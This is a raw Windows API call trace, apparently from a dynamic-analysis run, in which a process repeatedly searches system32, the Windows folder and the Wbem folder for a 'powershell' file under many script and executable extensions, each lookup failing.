	[0327.181] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.BAT", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.181] SetErrorMode (uMode=0x1) returned 0x1
	[0327.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.182] SetErrorMode (uMode=0x1) returned 0x1
	[0327.182] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.CMD", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.182] SetErrorMode (uMode=0x1) returned 0x1
	[0327.182] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.182] SetErrorMode (uMode=0x1) returned 0x1
	[0327.182] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.183] SetErrorMode (uMode=0x1) returned 0x1
	[0327.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.183] SetErrorMode (uMode=0x1) returned 0x1
	[0327.183] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.183] SetErrorMode (uMode=0x1) returned 0x1
	[0327.183] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.184] SetErrorMode (uMode=0x1) returned 0x1
	[0327.184] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.184] SetErrorMode (uMode=0x1) returned 0x1
	[0327.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.184] SetErrorMode (uMode=0x1) returned 0x1
	[0327.184] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.184] SetErrorMode (uMode=0x1) returned 0x1
	[0327.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.185] SetErrorMode (uMode=0x1) returned 0x1
	[0327.185] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.185] SetErrorMode (uMode=0x1) returned 0x1
	[0327.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.185] SetErrorMode (uMode=0x1) returned 0x1
	[0327.185] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.186] SetErrorMode (uMode=0x1) returned 0x1
	[0327.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.186] SetErrorMode (uMode=0x1) returned 0x1
	[0327.186] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.186] SetErrorMode (uMode=0x1) returned 0x1
	[0327.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.186] SetErrorMode (uMode=0x1) returned 0x1
	[0327.187] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.187] SetErrorMode (uMode=0x1) returned 0x1
	[0327.187] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.187] SetErrorMode (uMode=0x1) returned 0x1
	[0327.187] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.187] SetErrorMode (uMode=0x1) returned 0x1
	[0327.187] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.188] SetErrorMode (uMode=0x1) returned 0x1
	[0327.188] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.188] SetErrorMode (uMode=0x1) returned 0x1
	[0327.188] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.188] SetErrorMode (uMode=0x1) returned 0x1
	[0327.188] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.189] SetErrorMode (uMode=0x1) returned 0x1
	[0327.189] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.189] SetErrorMode (uMode=0x1) returned 0x1
	[0327.189] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.189] SetErrorMode (uMode=0x1) returned 0x1
	[0327.189] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.189] SetErrorMode (uMode=0x1) returned 0x1
	[0327.190] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.190] SetErrorMode (uMode=0x1) returned 0x1
	[0327.190] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.190] SetErrorMode (uMode=0x1) returned 0x1
	[0327.190] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.190] SetErrorMode (uMode=0x1) returned 0x1
	[0327.191] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.191] SetErrorMode (uMode=0x1) returned 0x1
	[0327.191] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.191] SetErrorMode (uMode=0x1) returned 0x1
	[0327.191] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.191] SetErrorMode (uMode=0x1) returned 0x1
	[0327.191] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.192] SetErrorMode (uMode=0x1) returned 0x1
	[0327.192] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.192] SetErrorMode (uMode=0x1) returned 0x1
	[0327.192] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.192] SetErrorMode (uMode=0x1) returned 0x1
	[0327.192] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.193] SetErrorMode (uMode=0x1) returned 0x1
	[0327.193] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.193] SetErrorMode (uMode=0x1) returned 0x1
	[0327.193] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.193] SetErrorMode (uMode=0x1) returned 0x1
	[0327.193] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.194] SetErrorMode (uMode=0x1) returned 0x1
	[0327.194] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.194] SetErrorMode (uMode=0x1) returned 0x1
	[0327.194] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.194] SetErrorMode (uMode=0x1) returned 0x1
	[0327.194] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.195] SetErrorMode (uMode=0x1) returned 0x1
	[0327.195] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.195] SetErrorMode (uMode=0x1) returned 0x1
	[0327.195] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.195] SetErrorMode (uMode=0x1) returned 0x1
	[0327.195] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.195] SetErrorMode (uMode=0x1) returned 0x1
	[0327.196] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.196] SetErrorMode (uMode=0x1) returned 0x1
	[0327.196] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.196] SetErrorMode (uMode=0x1) returned 0x1
	[0327.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.196] SetErrorMode (uMode=0x1) returned 0x1
	[0327.196] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.197] SetErrorMode (uMode=0x1) returned 0x1
	[0327.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0328.734] SetErrorMode (uMode=0x1) returned 0x1
	[0328.734] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0328.735] SetErrorMode (uMode=0x1) returned 0x1
	[0328.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0328.735] SetErrorMode (uMode=0x1) returned 0x1
	[0328.735] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0328.735] SetErrorMode (uMode=0x1) returned 0x1
	[0328.736] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0328.736] SetErrorMode (uMode=0x1) returned 0x1
	[0328.736] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0328.736] SetErrorMode (uMode=0x1) returned 0x1
	[0328.736] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0328.736] SetErrorMode (uMode=0x1) returned 0x1
	[0328.737] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0328.737] SetErrorMode (uMode=0x1) returned 0x1
	[0328.737] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0328.737] SetErrorMode (uMode=0x1) returned 0x1
	[0328.737] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c83dc00 | out: lpFindFileData=0x1c83dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0328.737] SetErrorMode (uMode=0x1) returned 0x1
	[0328.738] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c83da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0328.738] SetErrorMode (uMode=0x1) returned 0x1
